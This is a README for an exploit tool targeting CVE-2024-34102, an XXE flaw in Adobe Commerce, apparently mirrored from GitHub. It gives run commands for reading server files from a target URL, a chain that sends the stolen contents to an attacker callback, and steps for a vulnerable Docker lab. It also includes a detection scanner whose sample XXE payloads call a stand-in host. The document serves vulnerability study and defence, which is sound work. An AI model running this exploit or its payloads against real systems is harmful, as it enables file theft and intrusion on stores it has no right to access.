## https://sploitus.com/exploit?id=760B4444-4A68-518C-89AE-67D9A4EBDC6A
# CVE-2024-34102
Thanks to @th3gokul, Sanjaith3hacker, Chocapikk for the original code base.
## Description
CVE-2024-34102: Adobe Commerce XXE vulnerability.

Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.
## How to use
### Git clone
```sh
git clone https://github.com/EQSTSeminar/CVE-2024-34102.git
cd CVE-2024-34102
```
### Install packages
```sh
pip install -r requirements.txt
```
### Command
```sh
python CVE-2024-34102.py -u <URL_TO_EXPLOIT> -f <FILE_TO_READ>
```
### Example
```sh
python CVE-2024-34102.py -u https://magento.test -f /etc/hosts
```
### Output
![image](https://github.com/user-attachments/assets/1320573f-bb46-4d34-b2bf-42c0a8ce28fd)
## Vulnerable Environment Based on Docker
Thanks to markshust's Docker configuration for Magento, it isn't hard to build a vulnerable development environment.
https://github.com/markshust/docker-magento
```sh
# Create your project directory, then go into it:
mkdir -p /opt/magento
cd "$_"
# Install the tools the setup script needs
sudo apt update
sudo apt install -y bc curl
# Create Composer's directory (avoids an error during setup)
mkdir -p /var/www/.composer/
# Run this automated one-liner from the directory you want to install your project in.
curl -s https://raw.githubusercontent.com/markshust/docker-magento/release/next/lib/onelinesetup | bash -s -- magento.test 2.4.7 community
# Submit credentials when prompted.
# Add the test hostname to the hosts file (a plain >> redirect would not run with sudo's privileges)
echo "127.0.0.1 magento.test" | sudo tee -a /etc/hosts
```
![image](https://github.com/user-attachments/assets/4c556255-41c5-489a-9adb-a7bcb4e24169)
## PhpStorm
You can debug your Magento instance using PhpStorm.
### 1. Turn on Xdebug with the following command:
```sh
bin/xdebug enable
```
### 2. Then set up PhpStorm as shown:
![image](https://github.com/user-attachments/assets/b4554989-d2af-452c-ada9-28b4b0352060)
After that, you can debug your Magento instance.
# Attack Scenario
Create callback URL (mocky api) -> Blind XXE attack (CVE-2024-34102) -> Send file contents to attacker's instance (SSRFUtility) -> Read the attacker's instance (SSRFUtility)
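From the defender's side, the second step of this chain is visible in the request itself: the body has to declare an entity or DTD that points outside the document. The scanner below is an added example, not code from this repository. It flags such declarations in inbound request bodies. The function name, the sample bodies and the `callback.example.invalid` host are constructed for illustration, and it assumes the XML may arrive URL-encoded, HTML-encoded or backslash-escaped inside another format.

```python
import html
import re
from urllib.parse import unquote, urlparse

# A quote, optionally backslash-escaped (assumption: XML may travel inside a JSON string).
Q = r"\\?[\"']"
# External identifier: SYSTEM "uri" or PUBLIC "pubid" "uri".
EXT_ID = rf"(?:SYSTEM|PUBLIC\s+{Q}[^\"']*{Q})\s*{Q}(?P<uri>[^\"'\\\s>]+)"
ENTITY = re.compile(rf"<!ENTITY\s+(?P<param>%\s+)?(?P<name>[\w.:-]+)\s+{EXT_ID}", re.I)
DOCTYPE = re.compile(rf"<!DOCTYPE\s+(?P<name>[\w.:-]+)\s+{EXT_ID}", re.I)


def find_external_references(body: str) -> list[dict]:
    """Return every external entity or external DTD subset declared in a request body."""
    text = html.unescape(unquote(body))  # undo URL- and HTML-encoding before matching
    hits = []
    for rx in (ENTITY, DOCTYPE):
        for m in rx.finditer(text):
            if rx is DOCTYPE:
                kind = "external-dtd-subset"
            else:
                kind = "parameter-entity" if m.group("param") else "general-entity"
            target = urlparse(m.group("uri"))
            hits.append({"kind": kind, "name": m.group("name"),
                         "scheme": target.scheme or "relative",
                         "host": target.hostname, "uri": m.group("uri")})
    return hits


# Constructed sample bodies (not captured traffic); hosts use the reserved .invalid TLD.
SAMPLES = {
    "plain_xml": '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % dtd SYSTEM '
                 '"http://callback.example.invalid/x.dtd"> %dtd;]><r/>',
    "xml_in_json": '{"data": "<!DOCTYPE r [<!ENTITY % dtd SYSTEM '
                   '\\"http://callback.example.invalid/x.dtd\\">]>"}',
    "internal_only": '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY co "ACME">]><r>&co;</r>',
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, find_external_references(body))
```

A hit on an endpoint that has no reason to receive a DTD is worth alerting on, and the extracted `host` can be compared against outbound connections made by the application server.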
# Disclaimer
This repository is not intended to be an XXE exploit for CVE-2024-34102. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.
# EQST Insight
We publish CVE and malware analysis once a month. If you're interested, please follow the links below to check out our publications.
https://www.skshieldus.com/eng/business/insight.do